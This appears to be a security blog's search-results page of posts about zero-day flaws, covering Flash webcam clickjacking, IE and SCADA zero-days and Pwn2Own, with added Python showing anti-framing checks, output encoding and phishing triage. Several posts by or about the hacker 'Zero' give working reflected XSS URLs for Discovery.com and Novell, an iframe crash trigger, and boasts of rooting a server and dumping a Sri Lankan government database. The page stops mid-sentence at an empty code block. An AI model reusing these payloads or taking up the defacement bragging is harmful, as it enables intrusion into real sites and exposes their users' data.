Showing posts sorted by relevance for query Zero.

XSS in UK Gov sites found by Zero Cool

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Adobe Flash Zero-day Exploit Which Allowing Others To Use Your Webcam Has Been Patched


A Stanford University student recently disclosed a flaw in Adobe's Flash Player that let a malicious website switch on a visitor's webcam and microphone without their knowledge and then capture the video and audio. The attack is a clickjacking of the Flash Player Settings Manager: the Settings Manager is itself a SWF served from Adobe's servers, and a hostile page can load it nearly transparent over a decoy page and trick the visitor into clicking the button that allows camera and microphone access. Until a few days ago this worked on current Flash Player builds while Adobe worked on a fix. Feross Aboukhadijeh, the student in question, wrote about the flaw on October 18.
According to Feross Aboukhadijeh:-
"I discovered a vulnerability in Adobe Flash that allows any website to turn on your webcam and microphone without your knowledge or consent to spy on you. It works in all versions of Adobe Flash that I tested. I’ve confirmed that it works in the Firefox and Safari for Mac browsers. Use one of those if you check out the live demo. There’s a weird CSS opacity bug in most other browsers (Chrome for Mac and most browsers on Windows/Linux)."
Video Demo:-


Adobe closed the webcam hole on its own side, by changing the Settings Manager SWF hosted on its servers, so no Flash Player update was required for this particular issue. Separately, a month earlier (21 September 2011) Adobe had issued a critical Flash Player update fixing six security vulnerabilities, at least one of which was a zero-day being actively exploited in the wild. The security bulletin explains, "This update resolves a universal cross-site scripting issue that could be used to take actions on a user's behalf on any website or webmail provider if the user visits a malicious website (CVE-2011-2444)," adding,
"Note: There are reports that this issue is being exploited in the wild in active targeted attacks designed to trick the user into clicking on a malicious link delivered in an email message."
That zero-day is similar to a Flash flaw patched in June. Coincidentally, both the June vulnerability and this one were reported to Adobe by Google.
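What actually protected users after the fix was that the Settings Manager could no longer be overlaid by another site. For ordinary HTML pages the same property is enforced with the X-Frame-Options header or the CSP frame-ancestors directive, and the following Python check, added here as an illustration rather than anything from Feross's demo or Adobe's fix, evaluates a response's headers to decide whether a given third-party origin may frame the page. The Settings Manager URL and the origins used are illustrative. One caveat the disclosure makes clear: the demo embedded the Settings Manager SWF directly rather than the HTML page around it, so anti-framing headers on that page alone would not have stopped it, which is why Adobe had to change the SWF itself.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}

# Illustrative URL for the Settings Manager page; the real one lives on Adobe's servers
SETTINGS_MANAGER = ("https://www.macromedia.com/support/documentation/en/"
                    "flashplayer/help/settings_manager06.html")


def origin(url):
    """(scheme, host, port) of a URL, default port filled in so origins compare cleanly."""
    p = urlsplit(url)
    scheme = p.scheme.lower()
    return (scheme, (p.hostname or "").lower(), p.port or DEFAULT_PORTS.get(scheme))


def _host_matches(pattern, host):
    if pattern == "*":
        return True
    if pattern.startswith("*."):
        # *.adobe.com matches settings.adobe.com but not adobe.com itself
        return host.endswith(pattern[1:]) and host != pattern[2:]
    return host == pattern


def _source_allows(expr, page, framer):
    """Does one frame-ancestors source expression permit `framer` to embed `page`?"""
    expr = expr.lower()
    if expr == "'none'":
        return False
    if expr == "'self'":
        return framer == page
    if expr == "*":
        return True
    if expr.endswith(":") and "/" not in expr:      # scheme-source such as https:
        return framer[0] == expr[:-1]
    scheme = None
    if "://" in expr:                              # host-source: [scheme://]host[:port]
        scheme, expr = expr.split("://", 1)
    host, _, port = expr.partition(":")
    if scheme and framer[0] != scheme:
        return False
    if port and port != "*" and str(framer[2]) != port:
        return False
    return _host_matches(host, framer[1])


def frameable(headers, page_url, framer_url):
    """True if a browser honouring CSP and X-Frame-Options would let framer_url embed page_url."""
    page, framer = origin(page_url), origin(framer_url)
    hdrs = {k.lower(): v for k, v in headers.items()}
    for directive in hdrs.get("content-security-policy", "").split(";"):
        name, _, value = directive.strip().partition(" ")
        if name.lower() == "frame-ancestors":
            # frame-ancestors makes browsers ignore X-Frame-Options; an empty source list means 'none'
            return any(_source_allows(s, page, framer) for s in value.split())
    xfo = hdrs.get("x-frame-options", "").strip()
    token = xfo.upper()
    if token == "DENY":
        return False
    if token == "SAMEORIGIN":
        return framer == page
    if token.startswith("ALLOW-FROM"):
        parts = xfo.split(None, 1)
        return len(parts) == 2 and origin(parts[1]) == framer
    return True  # no anti-framing policy at all: any site can overlay and clickjack the page


if __name__ == "__main__":
    # No policy: exactly the exposure the clickjacking demo relied on
    print(frameable({}, SETTINGS_MANAGER, "http://attacker.example/game.html"))
    print(frameable({"X-Frame-Options": "DENY"}, SETTINGS_MANAGER, "http://attacker.example/"))
```

Because frame-ancestors takes precedence over X-Frame-Options when both are present, an ALLOW-FROM header next to a restrictive CSP is simply ignored; and a response with no policy at all comes back True, the state an overlayable page is in before anyone adds a header.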

For the patch and the full Adobe security bulletin, click here.




#CFP - Call For Papers Nullcon Delhi 2012 (International Security Conference)

After the success of nullcon Goa, preparations are under way for nullcon Delhi, which will showcase cutting-edge security technologies and discuss new attack vectors and security threats with the corporate world and the government sector. The event brings together thought leaders, corporates, government and security professionals under one roof. As official media partner, Team Voiceofgreyhat wishes Nullcon Delhi 2012 all the very best.


Categories:-

The talk time duration includes time for questions and answers (5-10 minutes).
  1. Research Category (40 mins - 1 hr) - is a deep knowledge technical track that includes new research, tools, vulnerabilities, zero days or exploits.
  2. Technical Category (30 mins - 1 hr) - comprises known security issues, case studies, a twist on existing research, tools, vulnerabilities or exploits, or research in progress. Although this track is fairly technical, it covers known techniques and analysis and is created specially for security professionals who are not deeply into new research: auditors, management professionals and newcomers.
  3. Desi Jugaad (1 hr) - is our signature research category talk and includes any local Indian/Asian hacks.

Submission Topics:-

  1. One of the topics of interest to us is Desi Jugaad(Local Indian/Asian Hack) and has a separate track of its own. Submissions can be any kind of local hacks that you have worked on (hints: electronic/mechanical meters, automobile hacking, Hardware, mobile phones, lock-picking, bypassing procedures and processes, etc. Be creative!)
  2. The topics pertaining to security and hacking in the following domains(but not limited to):
    • Hardware Hacking(ex: RFID, Magnetic Strips, Card Readers, Mobile Devices, Electronic Devices)
    • Tools/exploits/Zero-days (noncommercial)
    • Programming/Software Development security and weaknesses
    • Network vulnerabilities.
    • Information Warfare, cyber espionage, cyber crime, cyber laws
    • Malware, Botnets
    • Web attacks and application hacking
    • New attack vectors
    • Mobile malware, vulnerabilities, exploits, VOIP and Telecom
    • Virtualization security, hacking VMs, breaking out of VMs etc.
    • Cloud security, threats and exploitation
    • Critical Infrastructure
    • Satellite hacking
    • Forensics

Submission Format:-

Email the paper to : cfp@nullcon.net
The subject should be : CFP Delhi 2012 <Paper Title>
Email Body :

  1. Name
  2. Handle
  3. Track (& Time required in case of General/Business track)
  4. Paper Title
  5. Country(and City) of residence
  6. Organization and Designation
  7. Contact Number
  8. Have you presented or submitted this paper at any other conference(s) or magazine(s)?
    Yes, No. If yes, where? and how this submission is different from the previous ones. Note that new research talks already given elsewhere or are due to be given elsewhere prior to nullcon will be considered as Technical category talks unless they consist of cutting edge and ground breaking technology, which is at the judgment of the review committee.
  9. Are you releasing an open source tool?
    Yes/No. (If yes, please include the source code for review)
  10. Are you releasing an exploit?
    Yes/No. (If yes, please include the source and vulnerability details for review)
  11. Are you releasing a new vulnerability/Zero-day?
    Yes/No. (If yes, please send us the details, including reproduction procedure, for review)
  12. Why do you think your paper is different/innovative (for all tracks) and how does it qualify as new work/research(for Research track only)?
  13. Are there any live demonstrations (These earn you good points during review)?
    Yes/No. (If Yes, how many? Also please explain each demo)
  14. Brief Profile ( less than 500 Words)
  15. Paper Abstract - Please provide detailed workings of your research/work. The more details you provide, the better it is for the reviewers. Please keep the abstract to the point. Please do not try to hide the technical details or say "I can't disclose it till bla bla", as it does not help the reviewers in any way and may give your paper a low score because of insufficient information in the abstract.
  16. Your high resolution photo (attached)

Important Dates:-

CFP Opens: 25th April 2012
1st round of Speaker list Online: 10th June 2012
CFP Closing Date: 30th June 2012
Final speakers List online: 10th July 2012
Conference Dates: 26th-29th September 2012 


For Detailed Information Click Here 




XSS vulnerability found by zero cool


Discovery.com Vulnerable to XSS Said Zero


Zero Cool found a non-persistent (reflected) XSS vulnerability on the official Discovery website.

Vulnerable Website:-


Vulnerable Link:-


http://news.discovery.com/search/results.html?focus=site&query=%3E%22%3E%3CMARQUEE%3EHACKED+BY+ZERO+COOL%3C%2FMARQUEE%3E%3Ciframe%2Bsrc%2B%253D%22http%253A%252F%252Fwww.indishell.in%22%2Bwidth%253D%22100%2525%22%2Bheight%253D%22100%2525%22%3E%3C%252Fiframe%3E%26Submit%3DGo&search.x=37&search.y=14&search=search


Microsoft Issues 'fix it' To Close Internet Explorer 0-day Vulnerability


Over the last few days the security world has been preoccupied with an Internet Explorer bug, after researchers uncovered four active exploits for a zero-day vulnerability in the browser. As expected, Microsoft has released an emergency fix: a "Fix it" tool for the critical flaw in Internet Explorer 6, 7, 8 and 9 that attackers have been using to break into Windows systems. The company said it expects to issue the official patch (MS12-063) on Friday, Sept. 21.

"While we have only seen a few attempts to exploit this issue, impacting an extremely limited number of people, we are taking this proactive step to help ensure Internet Explorer customers are protected and able to safely browse online," said Yunsun Wee, director of Microsoft Trustworthy Computing, in a statement.

The zero-day in IE 6-9 (CVE-2012-4969) is a use-after-free memory corruption vulnerability that lets an attacker execute code remotely on the victim's machine. According to Jaime Blasco of AlienVault Labs, the original exploit payload dropped the PoisonIvy remote access Trojan (RAT) via a malicious Flash (.swf) file loaded by the exploit page, and the latest payload discovered dropped the PlugX RAT via the same Flash file. He also said the new exploits are the work of the Chinese group Nitro, the same group behind a pair of Java zero-day exploits disclosed in August.

Blasco also said the new exploits appear to be targeting defense contractors in the United States and India.
Microsoft recommended several workarounds Tuesday morning before announcing its intention to send out a FixIt.
  • Setting the Internet and Local intranet security zones to High, which blocks ActiveX controls and Active Scripting in both zones
  • Configure IE to prompt the user before running Active Scripting, or disable Active Scripting in both zones
  • Use of Microsoft's Enhanced Mitigation Experience Toolkit provides mitigations as well, and would not impact website usability, as both of the first two options might.
Microsoft also said that IE on Windows Server 2003, 2008 and 2008 R2 runs in a restricted mode that mitigates the vulnerability. Outlook, Outlook Express and Windows Mail also open HTML messages in a restricted zone, which mitigates the vulnerability, but should a user click a link in a message they could still be exploited.






Zero-day Exploit in iOS and Android Games Exposed by a 10-Year-Old Girl


A 10-year-old California girl's presentation at a hacker conference in Las Vegas is getting a lot of attention. The girl, who uses the pseudonym "CyFi," revealed a zero-day exploit in games on iOS and Android devices that independent researchers have confirmed as a new class of vulnerability. Zero-day exploits are those used or shared by attackers before the developer of the target software knows about the vulnerability. She first discovered the flaw earlier this year because she was bored with the pace of farm-style games.
While CyFi isn’t revealing which games are affected, most of them have time-dependent factors. She opened up the exploit by manually advancing a phone or tablet’s clock to force a game ahead in time. Some games block such a trick but the young hacker says she found ways to avoid those detections such as disconnecting the phone from Wi-Fi and making incremental clock adjustments.
CyFi’s presentation was part of DefCon Kids, a new offshoot of the annual hacker convention that features an area where kids can learn how to do things like open master locks, do certain kinds of hacks, code in scratch and communicate in code.
While her presentation at DefCon was her first public vulnerability disclosure, CyFi said she was only a little nervous. An artist, girl scout and downhill skier, she has spoken publically numerous times, usually at art galleries as a member of “The American Show,” an underground art collective based in San Francisco. According to her bio on the DefCon Kids Web site, CyFi has had her identity stolen twice.
Seth Rosenblatt of CNET points out that the new DefCon Kids programming reflects that "members of the hacking community are getting older and raising families."



eEye to Showcase IT Security Solutions that Simplify Vulnerability and Compliance Management at SecureWorld Expo in Atlanta

eEye Digital Security, a provider of IT security and unified vulnerability management solutions, will exhibit at the SecureWorld Expo in Atlanta, Georgia, May 3-4, 2011. The company’s CTO, Marc Maiffret, will participate as an industry expert on a network security panel discussion. The conference brings together the security leaders, experts, senior executives, and policy makers who shape the direction of security across Information Security, Physical Security, Compliance, IT Audit, Computer Forensics, Enterprise Risk Management, Business Continuity, and Security Management.
eEye invites the media and SecureWorld Expo attendees to explore the company's latest innovations, demonstrated in Booth 313, primarily the company’s Retina CS Management solution, Retina Insight reporting engine, as well as add-on modules for Configuration Compliance, Government Regulatory Reporting, and Patch Management.
eEye CTO, Marc Maiffret, will offer insights on the Industry Expert Panel, "Network Security: Finding the Right Management Program," to be held on Tuesday, May 3, 1:15-2:00 PM during the Open Vendor Sessions portion of the conference.
“It’s part of the eEye philosophy to regularly engage in dialogue with other security leaders and the IT security community at large,” said Marc Maiffret, CTO, eEye. “As a speaker on the Network Security panel, I’d like to open communication around some simple, practical tactics that IT professionals can use to significantly improve the security of their organization.”
At the event, eEye will encourage SecureWorld Expo attendees to take advantage of several free online resources that the company provides to the IT security community. Retina Community is a free vulnerability scanner for up to 32 IPs, now used by nearly four thousand organizations. Zero Day Tracker provides a catalogue of the newest zero-day vulnerabilities, instructions for quick remediation, and a historical record of past vulnerabilities. eEye's Vulnerability Expert Forum (VEF), hosted by Maiffret and the eEye Research Team, is a popular monthly webinar attended by hundreds of IT security professionals seeking insight on recently announced critical vulnerabilities from Microsoft and other software vendors.
eEye is participating in SecureWorld Expo’s “Dash for Prizes.” Attendees can register at the eEye Booth (313) throughout the two-day conference to win an Amazon Kindle and a $25 gift card. Winners will be announced during the last break of the conference on Wednesday, May 4. Attendees must be present to win.
About eEye Digital Security 
Since 1998, eEye Digital Security has made vulnerability and compliance management simpler and more efficient by providing the only unified solution that integrates assessment, mitigation, protection, and reporting into a complete offering with optional add-on modules for configuration compliance, regulatory reporting, and integrated patch management. eEye’s world-renowned research and development team is consistently the first to uncover critical vulnerabilities and build new protections into our solutions to prevent their exploit. Thousands of mid-to-large-size private-sector and government organizations, including the largest vulnerability management installations in the world, rely on eEye to protect against the latest known and zero-day vulnerabilities. More at eeye.com.


XSS vulnerability in novell.com



Non-persistent (reflected) XSS vulnerability found by Zero in novell.com.

Vulnerable Site:- 
http://www.novell.com/

Vulnerable Link:-
http://www.novell.com/SearchUI/query.action?term=<script>alert("ZERO+WAS+HERE")<%2Fscript>&hdrsrchsubmit.x=0&hdrsrchsubmit.y=0&hdrsrchsubmit=Search
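This search page, like the Discovery one above, reflects the query string straight back into the HTML, which is all a non-persistent XSS needs. The Python example below is added for illustration (it is not Novell's or Discovery's code): it decodes the term parameter from the Novell URL in this post the way a server-side framework would, shows a minimal vulnerable renderer beside the same page with output encoding, and includes the cheap probe a tester would send first. The page markup and the probe marker are hypothetical.

```python
import html
from urllib.parse import parse_qs, urlsplit

# URL taken from the post above; the Discovery link carries the same kind of payload
NOVELL_URL = ('http://www.novell.com/SearchUI/query.action?term=<script>alert("ZERO+WAS+HERE")'
              '<%2Fscript>&hdrsrchsubmit.x=0&hdrsrchsubmit.y=0&hdrsrchsubmit=Search')

# Hypothetical marker: harmless, but it only survives if the page encodes nothing
PROBE = "'\"><zero-probe>"


def query_param(url, name):
    """The parameter as the server sees it: percent-decoded, with '+' turned into a space."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get(name, [""])[0]


def render_search_vulnerable(term):
    """The pattern behind both bugs: the search term is echoed into the heading and the form field."""
    return (f"<h1>Results for: {term}</h1>\n"
            f"<input type='text' name='term' value='{term}'>")


def render_search_hardened(term):
    """Same page with output encoding; quote=True also escapes ' and ", covering the attribute."""
    safe = html.escape(term, quote=True)
    return (f"<h1>Results for: {safe}</h1>\n"
            f"<input type='text' name='term' value='{safe}'>")


def reflects_unescaped(render):
    """Cheap reflected-XSS test: does a marker full of HTML metacharacters come back verbatim?"""
    return PROBE in render(PROBE)


if __name__ == "__main__":
    term = query_param(NOVELL_URL, "term")
    print(term)                               # the decoded payload
    print(render_search_vulnerable(term))     # <script> lands in the page
    print(render_search_hardened(term))       # &lt;script&gt; is rendered as text
```

The hardened renderer encodes for the HTML body and for a quoted attribute; output inside a script block or a URL would need a different encoder, which is the usual reason "we escape everything" still leaks.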




14 Zero-day Vulnerabilities Found in SCADA Products by Italian Researcher



An Italian researcher has published details of a new batch of unpatched vulnerabilities found in the SCADA (Supervisory Control and Data Acquisition) products from seven different vendors.
Assessing the significance of the 14 zero-day vulnerabilities that Luigi Auriemma has documented, with proof-of-concept exploit code, is difficult, but they paint an unsettling picture of the flaws in systems normally hidden from sight. The affected vendors are Beckhoff, MeasureSoft, Rockwell, Carel, Progea, AzeoTech and Cogent, whose products control industrial systems across manufacturing, aerospace, the military, and more or less any other sector that uses SCADA.
Auriemma has a record of hunting down flaws in SCADA technology, having published 34 zero-day holes in March 2011. He remains unrepentant about his public disclosure of security flaws for which no patches exist.
"I like only to find them [flaws] and releasing the informations (sic) as soon as possible," he explains on his website. "And remember that I find bugs, I don't create them, the developers are the only people who create bugs (indirectly naturally) so they are ever the only responsible."
In the past year SCADA has gone from an obscure, albeit important, backwater of software security to the spotlight, thanks largely to the discovery of the Stuxnet worm, which was apparently deployed against systems used in Iran's nuclear program over a period of a year or more from the summer of 2009.
Who created it, and why, has been debated ever since, but it was clear that profit-seeking criminals were unlikely to have been behind it. With many suspecting a government's involvement, SCADA suddenly looked like a vulnerable underbelly of systems across almost every industry in the world.
SCADA exploits, meanwhile, have continued to be made public with disturbing regularity. 

-News Source (PC World & Cnet)



Full Disclosure Of Pentagon Data-breach


We're all human, you know? That's roughly the trick that the hackers most likely relied on when, earlier this year, they managed to steal over 24,000 files from a defense contractor.
The Pentagon won't say what files went astray, or the level of secrecy associated with the contents of the stolen data. But we can assume that at least some of it was highly secret—secret enough that Deputy Defense Secretary William J. Lynn III felt compelled to admit to the attack during a speech about the future of cyber policy yesterday. Lynn said it concerned some of the U.S.'s "most sensitive systems, including aircraft avionics, surveillance technologies" and more, before hinting that foreign powers were behind the attack and using it to declare cyberspace the next battleground.
What went down? Fast Company spoke to Nick Percoco, digital security expert and SVP at Trustwave's SpiderLabs, and familiar with exactly this sort of cyberattack, to get some insight.
How The Hack May Have Begun: Email Scams
The fact that the 24,000 stolen files came from a defense contractor is significant, Percoco notes. It is likely easier to get this sort of data from a contractor than by launching an all-out attack on Pentagon servers, because companies are full of people who are used to doing business in a digitally connected world. Even though a defense contractor's employee is probably far more switched on to digital security than you or I, it is still possible to trick someone with access to secret files into putting malware on their work laptop.
All it would take for a dedicated hacker is some basic research. If you wanted to steal data like this, you could start by targeting a particular employee via email—"We've seen this happen to defense contractors," Percoco notes. "Using technology like Google, and LinkedIn and other social networks" hackers could find out who best to target. Say they pick a particular EVP, and work out their email address is "JohnSmith@defencecontractorX.com." Then they work out who their colleagues or bosses may be all the way up to CEO level.
Then it's as simple as going to a source of hacking code using your underworld contacts (or using some of your own) and getting access to a "zero day exploit"—a new loophole in a computer or software system's security that hasn't been publicly discovered yet, and hence is still open for hacking use.
This is where the hack escalates. "In this case, they'd been looking for a zero-day exploit in, say, the Adobe PDF reader. And then they'd take a nice creative pen out and draft up a document that looks like it should be something important," Percoco said. After this, the hacker would set up something like a disposable Gmail account and make the screen name the same as one of the target's peers or the CEO of the company. Then they'd "craft up an email that says 'Here's an important document, some new announcement we're working on. Please review it and be ready for a call at 10 a.m. today.'" The trick is to send this to the target at around 7:30 a.m. local time, because the "best time to send those types of things is right before someone's had their coffee."
Typically the sleep-addled victim trusts the email, since it appears to come from a colleague, and opens the attached PDF (or other faked document). Usually this makes the newly launched program, Adobe Reader in this example, crash; but as it crashes it is actually installing malicious code on the machine. The malware is now in place.
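The lure Percoco describes leaves signals a mail gateway can check before anyone opens the PDF: an executive's name in the display name of a message from a throwaway webmail account, a Reply-To that points somewhere else, and a document attached by an external sender. The following Python triage function is an added example of that logic, not code from Trustwave or the article; the company domain is the one from the post's example address, while the executive directory, the webmail domains and the two MIME messages are constructed sample input.

```python
from email import message_from_string
from email.utils import parseaddr

COMPANY_DOMAIN = "defencecontractorx.com"          # domain from the post's example address
EXECUTIVE_NAMES = {"john smith", "jane doe"}       # constructed directory of likely impersonation targets
LURE_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".zip", ".exe", ".scr")


def _domain(addr):
    return addr.rpartition("@")[2].lower()


def lure_indicators(raw_message):
    """Reasons a message matches the spear-phish pattern above; an empty list means nothing fired."""
    msg = message_from_string(raw_message)
    reasons = []
    name, addr = parseaddr(msg.get("From", ""))
    from_domain = _domain(addr)
    external = from_domain != COMPANY_DOMAIN
    # 1. A colleague's or executive's name on a message that did not come from the company domain
    if external and name.strip().lower() in EXECUTIVE_NAMES:
        reasons.append(f"display name '{name}' is an internal executive but sender is {addr}")
    # 2. Replies redirected to a different domain than the one the message claims to come from
    _, reply_addr = parseaddr(msg.get("Reply-To", ""))
    if reply_addr and _domain(reply_addr) != from_domain:
        reasons.append(f"Reply-To {reply_addr} points away from the From domain")
    # 3. An "important document" attached by an outside sender
    for part in msg.walk():
        if part.get_content_disposition() != "attachment":
            continue
        filename = (part.get_filename() or "").lower()
        if external and filename.endswith(LURE_EXTENSIONS):
            reasons.append(f"document attachment '{filename}' from an external sender")
    return reasons


# Constructed sample messages (hypothetical domains; the PDF body is a truncated header, not a real file)
PHISH = """From: John Smith <john.smith.exec@example-webmail.test>
Reply-To: js.replies@other-webmail.test
To: analyst@defencecontractorx.com
Subject: Important document, be ready for a call at 10 a.m.
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Here's an important document, some new announcement we're working on. Please review it.
--b1
Content-Type: application/pdf; name="announcement.pdf"
Content-Disposition: attachment; filename="announcement.pdf"
Content-Transfer-Encoding: base64

JVBERi0xLjQK
--b1--
"""

BENIGN = """From: John Smith <john.smith@defencecontractorx.com>
To: analyst@defencecontractorx.com
Subject: Q3 announcement
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b2"

--b2
Content-Type: text/plain

Draft attached.
--b2
Content-Type: application/pdf; name="q3.pdf"
Content-Disposition: attachment; filename="q3.pdf"
Content-Transfer-Encoding: base64

JVBERi0xLjQK
--b2--
"""

if __name__ == "__main__":
    for reason in lure_indicators(PHISH):
        print("PHISH:", reason)
    print("BENIGN:", lure_indicators(BENIGN))
```

A name match on its own is noisy (plenty of external John Smiths exist), which is why the function returns reasons rather than a verdict; in practice these are scored together and the attachment is detonated before delivery.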
How The Attack Began: Website Sting
A similar attack is possible using a faked-up website that looks like it's actually related to the target company—one of those odd-looking, badly maintained websites that kinda looks official that we've all surfed to at some point and been confused by.
Some of these are actually storage pens for targeted malicious code, carefully honed to appear high on Google searches with SEO tricks. And when, say, a marketing official from the target company Googles to find out how their brand is being referenced around the web, they may stumble across one of these fake sites and trigger the release of malware onto their machine.
What Happened Next: Access Is King
Once the malicious code has been installed on the machine, the "sky's the limit," particularly via the email exploit. A well-coded virus code can evade detection and hide on the computer, doing various wicked things.
Often the "sole purpose of the executable is to go and find files on the person's computer and archive those in a zip file or RAR file, and then attempt to extract them from the system," Percoco said, based on his experience. The code could try lots of different routes, using FTP or HTTP or other protocols to get those files off the system. It's something he's seen in "many environments" and, worryingly, they're often "highly successful in getting those files." The code is typically designed to work on Windows machines, with almost no such exploits targeted at Macs—but Percoco agrees that this is at least partly due to the assumption by a hacker that a business user will be using a PC, not a Mac.
The success rests on the fact that no one has seen this particular attack before (the payoff of a zero-day exploit), so it sails past any antivirus software installed on the machine, which has no signature to look for. The only real way to avoid this sort of attack is for the target to "avoid clicking on documents," which is clearly unrealistic for a business user.
A smarter hacker would select a network administrator at the target company, because they're human, too. Their machine likely has even more interesting files that have data on network security, what kind of code is let in and let out of company firewalls, and so on.
Getting access to this sort of data (via the same email hack as described above) could let a persistent hacker penetrate a company's network and install a backdoor onto it—totally circumventing security because then "the attacker doesn't have to come in from the outside, they have code running on that system that will basically open up a connection back to the attacker"—not something network security is expecting. Then you can gain access to passwords and credentials to worm your way in further, eventually finding whatever sensitive data you're looking for.
The result could be a grim violation of company security. "We've seen those for a number of years, in all sorts of companies including government-type companies as well," Percoco says. 
Who Did This?
It's easy to see how a hacker could gain access to a machine and even a company network, and how easy it can be to transfer stolen files from infected computers to the hacker. But who is the hacker? The Deputy Secretary of Defense was careful to link it to "foreign" attackers, and considering this year's hacking news, we instantly imagine China is to blame.
Percoco says his company does hundreds of investigations every year on attacks like these, and it's "very, very difficult to trace an attack to a specific person and specific political motivation." That's unless it's a hacktivist attack, when a group like Anonymous posts the data online and admits it was to blame—and even then "you don't know where these people are actually located."
A hacker could take his laptop down to a coffee shop, buy a cup of joe and "get on their free Wi-Fi system. And now they go and start looking around the world to find a computer that has a security weakness." Once they find it, they can use the hacked computer for a targeting scenario like the one described above, where they send a tainted email. Anyone tracing the code back after the attack was detected may find it sourced on a corporate computer in, say, China. And then they're stuck—because no one's "going to let the U.S. government come in and do a forensic investigation on some business located in China." 
Furthermore, it's rare that even this first Net address is where the attack is coming from—"they're always jumping through one or many systems" Percoco says, which could be in numerous nations and thus completely confound any attempts to track them. Which means the attacker actually could be located anywhere.
The Cold Cyberwar?
Suddenly, there's a much more sinister angle to the Pentagon hack. Forget "The Chinese Way of Hacking." More like "Even More Malicious Hackers Looking Like They're Using The Chinese Way Of Hacking."

-News Source (Gizmodo)


Pwn2Own 2013 Result: Chrome, Firefox, IE, Adobe Reader, Flash & Java Owned, Only Safari Survived

A couple of months ago we covered the 'Pwn2Own 2013' hacking contest, sponsored by HP TippingPoint's Zero Day Initiative (ZDI) and Google, in which the most widely used browsers were put to the test. The results are now in, and they show how the browser security landscape can change in a single day: browsers thought to be secure were proven otherwise. Of the big four browsers only Apple's Safari was left standing; Chrome, Internet Explorer 10 and Firefox all fell. Three other popular targets, Adobe Reader, Flash Player and, yet again, Java, fell too. For Java it was a rout: it was broken three times, though under the contest rules only the first attacker was due to win the $20,000 prize.

Vupen, a French security research firm, cracked both Firefox and Internet Explorer. It summarised the Firefox attack in a tweet: "We've pwned Firefox using a use-after-free and a brand new technique to bypass ASLR/DEP on Win7 without the need of any ROP." Of Internet Explorer, the target that earned it the $100,000 prize, it tweeted: "We've pwned MS Surface Pro with two IE10 zero-days to achieve a full Windows 8 compromise with sandbox bypass." Lastly, UK-based MWR Labs cracked Chrome and gained full control of the operating system, in this case Windows 7, with "a full sandbox bypass exploit". The company explained in a blog post that it found a zero-day in Chrome "running on a modern Windows-based laptop" and exploited it in much the same way as the attacks that compromised Facebook, Microsoft and a number of other well-known companies: the laptop simply visited a malicious website.

Now lets take look at the final score board of Pwn2Own 2013:

Wednesday:
1:30 - Java (James Forshaw) PWNED
2:30 - Java (Joshua Drake) PWNED
3:30 - IE 10 (VUPEN Security) PWNED
4:30 - Chrome (Nils & Jon) PWNED
5:30 - Firefox (VUPEN Security) PWNED
5:31 - Java (VUPEN Security) PWNED

Thursday:
12pm - Flash (VUPEN Security) PWNED
1pm - Adobe Reader (George Hotz) PWNED
2pm - Java (Ben Murphy via proxy) PWNED


The total damage to the prize fund comes out at a whopping $480k. With HP's announcement that everyone will get paid for each attack, the prize monies will be divvied up as follows:-

  1. James Forshaw: Java = $20K
  2. Joshua Drake: Java = $20k
  3. VUPEN Security: IE10 + Firefox + Java + Flash = $250k
  4. Nils & Jon: Chrome = $100k
  5. George Hotz: Adobe Reader = $70k
  6. Ben Murphy: Java = $20k
As you all know, the main purpose of these contests is to make software safer by surfacing hidden vulnerabilities. The holes found at Pwn2Own have already been reported to the vendors, and patches for the browsers have already been released. Anyone still running older versions of the applications above should update. So, stay tuned with VOGH and be safe on the Internet.


-Source (HP, Naked Security) 









Iframe Injection Vulnerability Found By Zero on 2 Bangladeshi Govt. Websites

Zero found an iframe injection vulnerability on two Bangladeshi government websites: the official website of the Supreme Court of Bangladesh and the Digital Bangladesh site.

Vulnerable Sites:-

www.digitalbangladesh.gov.bd
www.supremecourt.gov.bd

Supreme Court of Bangladesh:-



Digital Bangladesh:-


Critical Zero-Day Vulnerability In Windows 7 (Exploitable Via Apple's Safari Browser)


A highly critical zero-day vulnerability has been found in Windows 7 that can be exploited via Apple's Safari browser. It was first made public by a Twitter user named w3bd3vil:

"<iframe height='18082563'></iframe> causes a BSoD [blue screen of death] on win 7 x64 via Safari. Lol!"


The vulnerability is reported to affect fully patched Windows 7 Professional 64-bit, and other versions may also be affected. The remotely triggerable bug, caused by an error in win32k.sys, could reportedly allow an attacker to run arbitrary code, such as malware, on a victim's machine when he or she visits a specially crafted web page using Safari. The page would simply need to contain an iframe (an HTML element normally used to pull content from other sources into a page) with an overly large "height" attribute.




Theexpert Server Rooted By Zero (TGH)


Theexpert server has been rooted by Zero, Indian Hacker from Team Greyhat (TGH). He hacked all the domains hosted on that server.

List of Hacked Sites & Mirrors:- 
http://pastebin.com/dc40Byn6

 


Railway Website of Srilanka is SQL-i Vulnerable (DB Hacked By Zero)

The official website of Sri Lanka Railways, railway.gov.lk, is vulnerable to SQL injection, says Zero. He also got into the database and exposed sensitive information such as the DB name, DB tables, admin details and other online users' details.


Vulnerable Website:- 
http://www.railway.gov.lk/

To see the hacked DB click Here




ProFTPD Zero Day Vulnerability Fixed



The zero-day vulnerability in ProFTPD reported through the Zero Day Initiative has been closed. The project's developers have released versions 1.3.3g and 1.3.4 of their open source FTP server. Both releases address a critical use-after-free memory corruption error in the response API code. The official release notes also confirm that the earlier Telnet IAC stack overflow vulnerability has been fixed.

Brief About The Vulnerability:- 
This vulnerability is located within the ProFTPD daemon and occurs because of the way the server manages the pools used for responses sent by the server to the client. When attempting to handle an exceptional condition, the server fails to restore a pointer used to hold an FTP response, and this can be used to trigger a controlled memory corruption.
The core of this vulnerability lies in the pr_cmd_dispatch_phase function in src/main.c, which is responsible for dispatching calls to any of the commands registered by the modules in modules/. On entry, the function saves the state of the resp_pool so that it can be restored on return. However, if an error occurs while executing a PRE_CMD handler, the server fails to restore that state. The save and restore are done with the pr_response_get_pool() and pr_response_set_pool(...) functions.
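To make the save-and-restore problem concrete, here is a small Python model added by the editor; it is not ProFTPD's code. Pool, Server, dispatch_buggy and dispatch_fixed are the model's own names standing in for the memory pool, the pr_response_get_pool()/pr_response_set_pool() pair and the dispatcher, and the point at which the model tears down the per-command pool is an assumption chosen to make the dangling pointer visible:

```python
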